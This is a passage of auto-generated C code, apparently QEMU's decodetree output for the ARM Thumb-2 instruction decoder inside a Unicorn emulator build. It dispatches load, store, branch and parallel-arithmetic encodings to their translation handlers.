/mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t32.decode:345 */ disas_t32_extract_disas_t32_Fmt_32(ctx, &u.f_i, insn); if (trans_SMC(ctx, &u.f_i)) return true; } if ((insn & 0x04702000) == 0x04600000) { /* 11110111 1110.... 1000.... ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t32.decode:346 */ disas_t32_extract_disas_t32_Fmt_33(ctx, &u.f_i, insn); if (trans_HVC(ctx, &u.f_i)) return true; } if ((insn & 0x04702000) == 0x04702000) { /* 11110111 1111.... 1010.... ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t32.decode:348 */ disas_t32_extract_disas_t32_Fmt_22(ctx, &u.f_empty, insn); if (trans_UDF(ctx, &u.f_empty)) return true; } } /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t32.decode:350 */ disas_t32_extract_disas_t32_Fmt_34(ctx, &u.f_ci, insn); if (trans_B_cond_thumb(ctx, &u.f_ci)) return true; return false; case 0x00001000: /* 11110... ........ 10.1.... ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t32.decode:629 */ disas_t32_extract_branch24(ctx, &u.f_i, insn); if (trans_B(ctx, &u.f_i)) return true; return false; case 0x00004000: /* 11110... ........ 11.0.... ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t32.decode:631 */ disas_t32_extract_branch24(ctx, &u.f_i, insn); if (trans_BLX_i(ctx, &u.f_i)) return true; return false; case 0x00005000: /* 11110... ........ 11.1.... ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t32.decode:630 */ disas_t32_extract_branch24(ctx, &u.f_i, insn); if (trans_BL(ctx, &u.f_i)) return true; return false; } return false; } return false; case 0x1f: /* 11111... ........ ........ ........ */ switch ((insn >> 24) & 0x7) { case 0x0: /* 11111000 ........ ........ ........ */ switch ((insn >> 20) & 0x7) { case 0x0: /* 11111000 .000.... ........ ........ */ switch ((insn >> 23) & 0x1) { case 0x0: /* 11111000 0000.... ........ ........ */ switch (insn & 0x00000900) { case 0x00000000: /* 11111000 0000.... ....0..0 ........ */ disas_t32_extract_ldst_rr(ctx, &u.f_ldst_rr, insn); switch (insn & 0x000006c0) { case 0x00000000: /* 11111000 0000.... ....0000 00...... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t32.decode:368 */ if (trans_STRB_rr(ctx, &u.f_ldst_rr)) return true; return false; } return false; case 0x00000800: /* 11111000 0000.... ....1..0 ........ */ switch ((insn >> 9) & 0x3) { case 0x2: /* 11111000 0000.... ....1100 ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t32.decode:370 */ disas_t32_extract_ldst_ri_neg(ctx, &u.f_ldst_ri, insn); if (trans_STRB_ri(ctx, &u.f_ldst_ri)) return true; return false; case 0x3: /* 11111000 0000.... ....1110 ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t32.decode:371 */ disas_t32_extract_ldst_ri_unp(ctx, &u.f_ldst_ri, insn); if (trans_STRBT_ri(ctx, &u.f_ldst_ri)) return true; return false; } return false; case 0x00000900: /* 11111000 0000.... ....1..1 ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t32.decode:369 */ disas_t32_extract_ldst_ri_idx(ctx, &u.f_ldst_ri, insn); if (trans_STRB_ri(ctx, &u.f_ldst_ri)) return true; return false; } return false; case 0x1: /* 11111000 1000.... ........ ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t32.decode:372 */ disas_t32_extract_ldst_ri_pos(ctx, &u.f_ldst_ri, insn); if (trans_STRB_ri(ctx, &u.f_ldst_ri)) return true; return false; } return false; case 0x1: /* 11111000 .001.... ........ ........ */ if ((insn & 0x000f0000) == 0x000f0000) { /* 11111000 .0011111 ........ ........ */ if ((insn & 0x0000f000) == 0x0000f000) { /* 11111000 .0011111 1111.... ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t32.decode:389 */ disas_t32_extract_disas_t32_Fmt_22(ctx, &u.f_empty, insn); if (trans_NOP(ctx, &u.f_empty)) return true; } /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t32.decode:390 */ disas_t32_extract_ldst_ri_lit(ctx, &u.f_ldst_ri, insn); if (trans_LDRB_ri(ctx, &u.f_ldst_ri)) return true; } if ((insn & 0x00800000) == 0x00800000) { /* 11111000 1001.... ........ ........ */ if ((insn & 0x0000f000) == 0x0000f000) { /* 11111000 1001.... 1111.... ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t32.decode:393 */ disas_t32_extract_disas_t32_Fmt_22(ctx, &u.f_empty, insn); if (trans_NOP(ctx, &u.f_empty)) return true; } /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t32.decode:394 */ disas_t32_extract_ldst_ri_pos(ctx, &u.f_ldst_ri, insn); if (trans_LDRB_ri(ctx, &u.f_ldst_ri)) return true; } if ((insn & 0x00800900) == 0x00000900) { /* 11111000 0001.... ....1..1 ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t32.decode:396 */ disas_t32_extract_ldst_ri_idx(ctx, &u.f_ldst_ri, insn); if (trans_LDRB_ri(ctx, &u.f_ldst_ri)) return true; } if ((insn & 0x00800f00) == 0x00000c00) { /* 11111000 0001.... ....1100 ........ */ if ((insn & 0x0000f000) == 0x0000f000) { /* 11111000 0001.... 11111100 ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t32.decode:398 */ disas_t32_extract_disas_t32_Fmt_22(ctx, &u.f_empty, insn); if (trans_NOP(ctx, &u.f_empty)) return true; } /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t32.decode:399 */ disas_t32_extract_ldst_ri_neg(ctx, &u.f_ldst_ri, insn); if (trans_LDRB_ri(ctx, &u.f_ldst_ri)) return true; } if ((insn & 0x00800f00) == 0x00000e00) { /* 11111000 0001.... ....1110 ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t32.decode:401 */ disas_t32_extract_ldst_ri_unp(ctx, &u.f_ldst_ri, insn); if (trans_LDRBT_ri(ctx, &u.f_ldst_ri)) return true; } if ((insn & 0x00800fc0) == 0x00000000) { /* 11111000 0001.... ....0000 00...... */ if ((insn & 0x0000f000) == 0x0000f000) { /* 11111000 0001.... 11110000 00...... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t32.decode:403 */ disas_t32_extract_disas_t32_Fmt_22(ctx, &u.f_empty, insn); if (trans_NOP(ctx, &u.f_empty)) return true; } /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t32.decode:404 */ disas_t32_extract_ldst_rr(ctx, &u.f_ldst_rr, insn); if (trans_LDRB_rr(ctx, &u.f_ldst_rr)) return true; } return false; case 0x2: /* 11111000 .010.... ........ ........ */ switch ((insn >> 23) & 0x1) { case 0x0: /* 11111000 0010.... ........ ........ */ switch (insn & 0x00000900) { case 0x00000000: /* 11111000 0010.... ....0..0 ........ */ disas_t32_extract_ldst_rr(ctx, &u.f_ldst_rr, insn); switch (insn & 0x000006c0) { case 0x00000000: /* 11111000 0010.... ....0000 00...... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t32.decode:374 */ if (trans_STRH_rr(ctx, &u.f_ldst_rr)) return true; return false; } return false; case 0x00000800: /* 11111000 0010.... ....1..0 ........ */ switch ((insn >> 9) & 0x3) { case 0x2: /* 11111000 0010.... ....1100 ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t32.decode:376 */ disas_t32_extract_ldst_ri_neg(ctx, &u.f_ldst_ri, insn); if (trans_STRH_ri(ctx, &u.f_ldst_ri)) return true; return false; case 0x3: /* 11111000 0010.... ....1110 ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t32.decode:377 */ disas_t32_extract_ldst_ri_unp(ctx, &u.f_ldst_ri, insn); if (trans_STRHT_ri(ctx, &u.f_ldst_ri)) return true; return false; } return false; case 0x00000900: /* 11111000 0010.... ....1..1 ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t32.decode:375 */ disas_t32_extract_ldst_ri_idx(ctx, &u.f_ldst_ri, insn); if (trans_STRH_ri(ctx, &u.f_ldst_ri)) return true; return false; } return false; case 0x1: /* 11111000 1010.... ........ ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t32.decode:378 */ disas_t32_extract_ldst_ri_pos(ctx, &u.f_ldst_ri, insn); if (trans_STRH_ri(ctx, &u.f_ldst_ri)) return true; return false; } return false; case 0x3: /* 11111000 .011.... ........ ........ */ if ((insn & 0x000f0000) == 0x000f0000) { /* 11111000 .0111111 ........ ........ */ if ((insn & 0x0000f000) == 0x0000f000) { /* 11111000 .0111111 1111.... ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t32.decode:409 */ disas_t32_extract_disas_t32_Fmt_22(ctx, &u.f_empty, insn); if (trans_NOP(ctx, &u.f_empty)) return true; } /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t32.decode:410 */ disas_t32_extract_ldst_ri_lit(ctx, &u.f_ldst_ri, insn); if (trans_LDRH_ri(ctx, &u.f_ldst_ri)) return true; } if ((insn & 0x00800000) == 0x00800000) { /* 11111000 1011.... ........ ........ */ if ((insn & 0x0000f000) == 0x0000f000) { /* 11111000 1011.... 1111.... ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t32.decode:413 */ disas_t32_extract_disas_t32_Fmt_22(ctx, &u.f_empty, insn); if (trans_NOP(ctx, &u.f_empty)) return true; } /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t32.decode:414 */ disas_t32_extract_ldst_ri_pos(ctx, &u.f_ldst_ri, insn); if (trans_LDRH_ri(ctx, &u.f_ldst_ri)) return true; } if ((insn & 0x00800900) == 0x00000900) { /* 11111000 0011.... ....1..1 ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t32.decode:416 */ disas_t32_extract_ldst_ri_idx(ctx, &u.f_ldst_ri, insn); if (trans_LDRH_ri(ctx, &u.f_ldst_ri)) return true; } if ((insn & 0x00800f00) == 0x00000c00) { /* 11111000 0011.... ....1100 ........ */ if ((insn & 0x0000f000) == 0x0000f000) { /* 11111000 0011.... 11111100 ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t32.decode:418 */ disas_t32_extract_disas_t32_Fmt_22(ctx, &u.f_empty, insn); if (trans_NOP(ctx, &u.f_empty)) return true; } /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t32.decode:419 */ disas_t32_extract_ldst_ri_neg(ctx, &u.f_ldst_ri, insn); if (trans_LDRH_ri(ctx, &u.f_ldst_ri)) return true; } if ((insn & 0x00800f00) == 0x00000e00) { /* 11111000 0011.... ....1110 ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t32.decode:421 */ disas_t32_extract_ldst_ri_unp(ctx, &u.f_ldst_ri, insn); if (trans_LDRHT_ri(ctx, &u.f_ldst_ri)) return true; } if ((insn & 0x00800fc0) == 0x00000000) { /* 11111000 0011.... ....0000 00...... */ if ((insn & 0x0000f000) == 0x0000f000) { /* 11111000 0011.... 11110000 00...... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t32.decode:423 */ disas_t32_extract_disas_t32_Fmt_22(ctx, &u.f_empty, insn); if (trans_NOP(ctx, &u.f_empty)) return true; } /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t32.decode:424 */ disas_t32_extract_ldst_rr(ctx, &u.f_ldst_rr, insn); if (trans_LDRH_rr(ctx, &u.f_ldst_rr)) return true; } return false; case 0x4: /* 11111000 .100.... ........ ........ */ switch ((insn >> 23) & 0x1) { case 0x0: /* 11111000 0100.... ........ ........ */ switch (insn & 0x00000900) { case 0x00000000: /* 11111000 0100.... ....0..0 ........ */ disas_t32_extract_ldst_rr(ctx, &u.f_ldst_rr, insn); switch (insn & 0x000006c0) { case 0x00000000: /* 11111000 0100.... ....0000 00...... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t32.decode:380 */ if (trans_STR_rr(ctx, &u.f_ldst_rr)) return true; return false; } return false; case 0x00000800: /* 11111000 0100.... ....1..0 ........ */ switch ((insn >> 9) & 0x3) { case 0x2: /* 11111000 0100.... ....1100 ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t32.decode:382 */ disas_t32_extract_ldst_ri_neg(ctx, &u.f_ldst_ri, insn); if (trans_STR_ri(ctx, &u.f_ldst_ri)) return true; return false; case 0x3: /* 11111000 0100.... ....1110 ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t32.decode:383 */ disas_t32_extract_ldst_ri_unp(ctx, &u.f_ldst_ri, insn); if (trans_STRT_ri(ctx, &u.f_ldst_ri)) return true; return false; } return false; case 0x00000900: /* 11111000 0100.... ....1..1 ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t32.decode:381 */ disas_t32_extract_ldst_ri_idx(ctx, &u.f_ldst_ri, insn); if (trans_STR_ri(ctx, &u.f_ldst_ri)) return true; return false; } return false; case 0x1: /* 11111000 1100.... ........ ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t32.decode:384 */ disas_t32_extract_ldst_ri_pos(ctx, &u.f_ldst_ri, insn); if (trans_STR_ri(ctx, &u.f_ldst_ri)) return true; return false; } return false; case 0x5: /* 11111000 .101.... ........ ........ */ if ((insn & 0x000f0000) == 0x000f0000) { /* 11111000 .1011111 ........ ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t32.decode:428 */ disas_t32_extract_ldst_ri_lit(ctx, &u.f_ldst_ri, insn); if (trans_LDR_ri(ctx, &u.f_ldst_ri)) return true; } if ((insn & 0x00800000) == 0x00800000) { /* 11111000 1101.... ........ ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t32.decode:429 */ disas_t32_extract_ldst_ri_pos(ctx, &u.f_ldst_ri, insn); if (trans_LDR_ri(ctx, &u.f_ldst_ri)) return true; } if ((insn & 0x00800900) == 0x00000900) { /* 11111000 0101.... ....1..1 ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t32.decode:430 */ disas_t32_extract_ldst_ri_idx(ctx, &u.f_ldst_ri, insn); if (trans_LDR_ri(ctx, &u.f_ldst_ri)) return true; } if ((insn & 0x00800f00) == 0x00000c00) { /* 11111000 0101.... ....1100 ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t32.decode:431 */ disas_t32_extract_ldst_ri_neg(ctx, &u.f_ldst_ri, insn); if (trans_LDR_ri(ctx, &u.f_ldst_ri)) return true; } if ((insn & 0x00800f00) == 0x00000e00) { /* 11111000 0101.... ....1110 ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t32.decode:432 */ disas_t32_extract_ldst_ri_unp(ctx, &u.f_ldst_ri, insn); if (trans_LDRT_ri(ctx, &u.f_ldst_ri)) return true; } if ((insn & 0x00800fc0) == 0x00000000) { /* 11111000 0101.... ....0000 00...... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t32.decode:433 */ disas_t32_extract_ldst_rr(ctx, &u.f_ldst_rr, insn); if (trans_LDR_rr(ctx, &u.f_ldst_rr)) return true; } return false; } return false; case 0x1: /* 11111001 ........ ........ ........ */ switch ((insn >> 20) & 0x7) { case 0x1: /* 11111001 .001.... ........ ........ */ if ((insn & 0x000f0000) == 0x000f0000) { /* 11111001 .0011111 ........ ........ */ if ((insn & 0x0000f000) == 0x0000f000) { /* 11111001 .0011111 1111.... ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t32.decode:438 */ disas_t32_extract_disas_t32_Fmt_22(ctx, &u.f_empty, insn); if (trans_NOP(ctx, &u.f_empty)) return true; } /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t32.decode:439 */ disas_t32_extract_ldst_ri_lit(ctx, &u.f_ldst_ri, insn); if (trans_LDRSB_ri(ctx, &u.f_ldst_ri)) return true; } if ((insn & 0x00800000) == 0x00800000) { /* 11111001 1001.... ........ ........ */ if ((insn & 0x0000f000) == 0x0000f000) { /* 11111001 1001.... 1111.... ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t32.decode:442 */ disas_t32_extract_disas_t32_Fmt_22(ctx, &u.f_empty, insn); if (trans_NOP(ctx, &u.f_empty)) return true; } /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t32.decode:443 */ disas_t32_extract_ldst_ri_pos(ctx, &u.f_ldst_ri, insn); if (trans_LDRSB_ri(ctx, &u.f_ldst_ri)) return true; } if ((insn & 0x00800900) == 0x00000900) { /* 11111001 0001.... ....1..1 ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t32.decode:445 */ disas_t32_extract_ldst_ri_idx(ctx, &u.f_ldst_ri, insn); if (trans_LDRSB_ri(ctx, &u.f_ldst_ri)) return true; } if ((insn & 0x00800f00) == 0x00000c00) { /* 11111001 0001.... ....1100 ........ */ if ((insn & 0x0000f000) == 0x0000f000) { /* 11111001 0001.... 11111100 ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t32.decode:447 */ disas_t32_extract_disas_t32_Fmt_22(ctx, &u.f_empty, insn); if (trans_NOP(ctx, &u.f_empty)) return true; } /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t32.decode:448 */ disas_t32_extract_ldst_ri_neg(ctx, &u.f_ldst_ri, insn); if (trans_LDRSB_ri(ctx, &u.f_ldst_ri)) return true; } if ((insn & 0x00800f00) == 0x00000e00) { /* 11111001 0001.... ....1110 ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t32.decode:450 */ disas_t32_extract_ldst_ri_unp(ctx, &u.f_ldst_ri, insn); if (trans_LDRSBT_ri(ctx, &u.f_ldst_ri)) return true; } if ((insn & 0x00800fc0) == 0x00000000) { /* 11111001 0001.... ....0000 00...... */ if ((insn & 0x0000f000) == 0x0000f000) { /* 11111001 0001.... 11110000 00...... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t32.decode:452 */ disas_t32_extract_disas_t32_Fmt_22(ctx, &u.f_empty, insn); if (trans_NOP(ctx, &u.f_empty)) return true; } /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t32.decode:453 */ disas_t32_extract_ldst_rr(ctx, &u.f_ldst_rr, insn); if (trans_LDRSB_rr(ctx, &u.f_ldst_rr)) return true; } return false; case 0x3: /* 11111001 .011.... ........ ........ */ if ((insn & 0x000f0000) == 0x000f0000) { /* 11111001 .0111111 ........ ........ */ if ((insn & 0x0000f000) == 0x0000f000) { /* 11111001 .0111111 1111.... ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t32.decode:459 */ disas_t32_extract_disas_t32_Fmt_22(ctx, &u.f_empty, insn); if (trans_NOP(ctx, &u.f_empty)) return true; } /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t32.decode:460 */ disas_t32_extract_ldst_ri_lit(ctx, &u.f_ldst_ri, insn); if (trans_LDRSH_ri(ctx, &u.f_ldst_ri)) return true; } if ((insn & 0x00800000) == 0x00800000) { /* 11111001 1011.... ........ ........ */ if ((insn & 0x0000f000) == 0x0000f000) { /* 11111001 1011.... 1111.... ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t32.decode:463 */ disas_t32_extract_disas_t32_Fmt_22(ctx, &u.f_empty, insn); if (trans_NOP(ctx, &u.f_empty)) return true; } /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t32.decode:464 */ disas_t32_extract_ldst_ri_pos(ctx, &u.f_ldst_ri, insn); if (trans_LDRSH_ri(ctx, &u.f_ldst_ri)) return true; } if ((insn & 0x00800900) == 0x00000900) { /* 11111001 0011.... ....1..1 ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t32.decode:466 */ disas_t32_extract_ldst_ri_idx(ctx, &u.f_ldst_ri, insn); if (trans_LDRSH_ri(ctx, &u.f_ldst_ri)) return true; } if ((insn & 0x00800f00) == 0x00000c00) { /* 11111001 0011.... ....1100 ........ */ if ((insn & 0x0000f000) == 0x0000f000) { /* 11111001 0011.... 11111100 ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t32.decode:468 */ disas_t32_extract_disas_t32_Fmt_22(ctx, &u.f_empty, insn); if (trans_NOP(ctx, &u.f_empty)) return true; } /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t32.decode:469 */ disas_t32_extract_ldst_ri_neg(ctx, &u.f_ldst_ri, insn); if (trans_LDRSH_ri(ctx, &u.f_ldst_ri)) return true; } if ((insn & 0x00800f00) == 0x00000e00) { /* 11111001 0011.... ....1110 ........ */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t32.decode:471 */ disas_t32_extract_ldst_ri_unp(ctx, &u.f_ldst_ri, insn); if (trans_LDRSHT_ri(ctx, &u.f_ldst_ri)) return true; } if ((insn & 0x00800fc0) == 0x00000000) { /* 11111001 0011.... ....0000 00...... */ if ((insn & 0x0000f000) == 0x0000f000) { /* 11111001 0011.... 11110000 00...... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t32.decode:473 */ disas_t32_extract_disas_t32_Fmt_22(ctx, &u.f_empty, insn); if (trans_NOP(ctx, &u.f_empty)) return true; } /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t32.decode:474 */ disas_t32_extract_ldst_rr(ctx, &u.f_ldst_rr, insn); if (trans_LDRSH_rr(ctx, &u.f_ldst_rr)) return true; } return false; } return false; case 0x2: /* 11111010 ........ ........ ........ */ switch (insn & 0x0080f0c0) { case 0x0000f000: /* 11111010 0....... 1111.... 00...... */ disas_t32_extract_disas_t32_Fmt_4(ctx, &u.f_s_rrr_shr, insn); switch ((insn >> 4) & 0x3) { case 0x0: /* 11111010 0....... 1111.... 0000.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t32.decode:93 */ if (trans_MOV_rxrr(ctx, &u.f_s_rrr_shr)) return true; return false; } return false; case 0x0000f080: /* 11111010 0....... 1111.... 10...... */ disas_t32_extract_rrr_rot(ctx, &u.f_rrr_rot, insn); switch ((insn >> 20) & 0x7) { case 0x0: /* 11111010 0000.... 1111.... 10...... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t32.decode:596 */ if (trans_SXTAH(ctx, &u.f_rrr_rot)) return true; return false; case 0x1: /* 11111010 0001.... 1111.... 10...... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t32.decode:597 */ if (trans_UXTAH(ctx, &u.f_rrr_rot)) return true; return false; case 0x2: /* 11111010 0010.... 1111.... 10...... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t32.decode:598 */ if (trans_SXTAB16(ctx, &u.f_rrr_rot)) return true; return false; case 0x3: /* 11111010 0011.... 1111.... 10...... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t32.decode:599 */ if (trans_UXTAB16(ctx, &u.f_rrr_rot)) return true; return false; case 0x4: /* 11111010 0100.... 1111.... 10...... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t32.decode:600 */ if (trans_SXTAB(ctx, &u.f_rrr_rot)) return true; return false; case 0x5: /* 11111010 0101.... 1111.... 10...... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t32.decode:601 */ if (trans_UXTAB(ctx, &u.f_rrr_rot)) return true; return false; } return false; case 0x0080f000: /* 11111010 1....... 1111.... 00...... */ disas_t32_extract_rndm(ctx, &u.f_rrr, insn); switch (insn & 0x00700030) { case 0x00000000: /* 11111010 1000.... 1111.... 0000.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t32.decode:550 */ if (trans_SADD8(ctx, &u.f_rrr)) return true; return false; case 0x00000010: /* 11111010 1000.... 1111.... 0001.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t32.decode:551 */ if (trans_QADD8(ctx, &u.f_rrr)) return true; return false; case 0x00000020: /* 11111010 1000.... 1111.... 0010.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t32.decode:552 */ if (trans_SHADD8(ctx, &u.f_rrr)) return true; return false; case 0x00100000: /* 11111010 1001.... 1111.... 0000.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t32.decode:557 */ if (trans_SADD16(ctx, &u.f_rrr)) return true; return false; case 0x00100010: /* 11111010 1001.... 1111.... 0001.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t32.decode:558 */ if (trans_QADD16(ctx, &u.f_rrr)) return true; return false; case 0x00100020: /* 11111010 1001.... 1111.... 0010.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t32.decode:559 */ if (trans_SHADD16(ctx, &u.f_rrr)) return true; return false; case 0x00200000: /* 11111010 1010.... 1111.... 0000.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t32.decode:564 */ if (trans_SASX(ctx, &u.f_rrr)) return true; return false; case 0x00200010: /* 11111010 1010.... 1111.... 0001.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t32.decode:565 */ if (trans_QASX(ctx, &u.f_rrr)) return true; return false; case 0x00200020: /* 11111010 1010.... 1111.... 0010.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t32.decode:566 */ if (trans_SHASX(ctx, &u.f_rrr)) return true; return false; case 0x00400000: /* 11111010 1100.... 1111.... 0000.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t32.decode:571 */ if (trans_SSUB8(ctx, &u.f_rrr)) return true; return false; case 0x00400010: /* 11111010 1100.... 1111.... 0001.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t32.decode:572 */ if (trans_QSUB8(ctx, &u.f_rrr)) return true; return false; case 0x00400020: /* 11111010 1100.... 1111.... 0010.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t32.decode:573 */ if (trans_SHSUB8(ctx, &u.f_rrr)) return true; return false; case 0x00500000: /* 11111010 1101.... 1111.... 0000.... */ /* /mnt/c/Users/me/Documents/projects/unicorn2/tmp/tmp/qemu-5.0.0/target/arm/t32.decode:578 */ if (trans_SSUB16(ctx, &u.f_rrr)) return true; return false; case 0x00500010: /* 11111010 1101.... 1111.... 0001.... */ /* 